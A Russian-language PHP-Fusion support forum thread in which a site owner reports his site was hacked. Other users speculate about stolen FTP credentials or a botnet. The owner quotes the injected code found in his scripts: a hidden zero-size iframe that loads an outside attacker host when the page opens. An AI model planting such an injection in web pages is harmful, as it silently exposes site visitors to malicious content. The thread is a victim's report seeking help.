Регистрация    Забыли пароль?        Правила форума    FAQ (читать перед созданием новой темы)
Имя   Пароль  запомнить
  
Просмотр темы
Вернуться на сайт: PHP-Fusion SF Russian Support Site

Форум поддержки PHP-Fusion SF | PHP-Fusion SF - Система Управлением Сайта | Ошибки / Bugs Reports
# 1 Тема: взломали!
jENDos
Пользователь

Avatar пользователя




новичек

Сообщений: 5
Зарегистрирован: 04 Марта 2008, 21:47:57
Сказали спасибо 0 раз
Статус: offline
Опубликовано 26 Октября 2009, 22:08:34
Сегодня утром мой сайт на фьюжине 7.00.05 не окрылся. тупо не открылся. Говорит, кавычка в maincore.php не поставлена, открываться не буду. Странно, думаю, всё раньше там стояло. Наверно кто-то полазил. Грешил на друганов. А как открыл, сразу стало ясно, что внедрили мне сниффер. Почти во всех скриптах написано:
function makefilelist($folder, $filt){}
<iframe frameborder="0" onload="if (!this.src){ this.src='http://testoogle.ru:8080/index.php'; this.height='0'; this.width='0';}" >eyzczxznwsbluriwcxsmutaaglcjslo</iframe>


Хорошо, хостинг не подвел, они делают каждый день бэкапы и две недели хранят. Восстановил сайт.

Хотел по логам вычислить, кто хулиганит. Нашел очень много разных ипишников: Венгрия, Испания, Литва... ботнет вобщем.

Сайт-то восстановил, а вот чем бы закрыть багу? Подскажите, люди добрые.


--------------------
98% ошибок операционной системы находится в полуметре от монитора
^ наверх ^
# 2  
snake_oriental
Пользователь

Avatar пользователя

Панки - Хой :)

Любитель Fusion

Сообщений: 349
Откуда: Украина, г.Кривой Рог
Зарегистрирован: 19 Апреля 2007, 18:17:28
Сказали спасибо 35 раз
Статус: offline
ICQ статус 746800
Опубликовано 26 Октября 2009, 22:39:12
Форумами двига слегка ошибся, а где баг? Если там сниффер поставили это не значит что это баг движка, логи и пароли лучше хранить дома на листике.


--------------------
Истинная мудрость так проста, но нам в неё неврубится smiley
Вконтакте - Группа: CMS - PHP-Fusion
All Fusion :: Плагины, моды, темы оформления для 6 и 7 версий PHP-Fusion
^ наверх ^ snake_oriental 746800 snake_oriental@hotmail.com snake.oriental@yandex.ru all-fusion.com
# 3  
jENDos
Пользователь

Avatar пользователя




новичек

Сообщений: 5
Зарегистрирован: 04 Марта 2008, 21:47:57
Сказали спасибо 0 раз
Статус: offline
Опубликовано 26 Октября 2009, 23:14:36
Ну я не думаю, что ботнет был направлен именно на меня, ибо сайт никому не нужен. Скорее всего, искали сайты по копирайтам или версиям движка. и всех "хакали".


--------------------
98% ошибок операционной системы находится в полуметре от монитора
^ наверх ^
# 4  
lumian
Пользователь

Avatar пользователя




Любитель Fusion

Сообщений: 192
Откуда: Вологда
Зарегистрирован: 02 Апреля 2008, 17:06:17
Сказали спасибо 16 раз
Статус: offline
Опубликовано 29 Октября 2009, 12:49:04
Скорее всего твои логин и пароль попали в базу недохакерам, в которой кроме твоего еще тыща таких же пар логин-пароль, вот на все и поставили. Кстати говоря, праграммно зайти на FTP и модифицировать код каждого файла не так уж и сложно...
 
^ наверх ^
# 5  
jENDos
Пользователь

Avatar пользователя




новичек

Сообщений: 5
Зарегистрирован: 04 Марта 2008, 21:47:57
Сказали спасибо 0 раз
Статус: offline
Опубликовано 30 Октября 2009, 15:29:55
Ну не 123 же у меня пароль на фтп. Плюс, я редко им пользуюсь. Сайт сделал и всё. Даже если троян какой-нить (хотя я предохраняюсь), всё равно глупо собирать пароли от какого-то там фьюжина. Заражены не все скрипты, избирательно как-то. Из этого можно сделать вывод, что атака не по паролю, не по популярности сайта(кому он нах нужен), а именно по структуре движка. Атака глобальная, ботнетом. По идее, упасть должно было много сайтов. Хотя, мне повезло, что там в коде опечатка была, скрипт не выполнился и я это заетил. А если всё было бы написано правильно, да никто и не заметит, что у него на сайте работает сниффер! Только так могу объяснить, почему больше ни у кого такого не было.


--------------------
98% ошибок операционной системы находится в полуметре от монитора
^ наверх ^
Перейти на форум:


94,126,770 уникальных посетителей
сейчас: 28 Марта 2024, 15:06:43
Генерация страницы: 0.14 сек.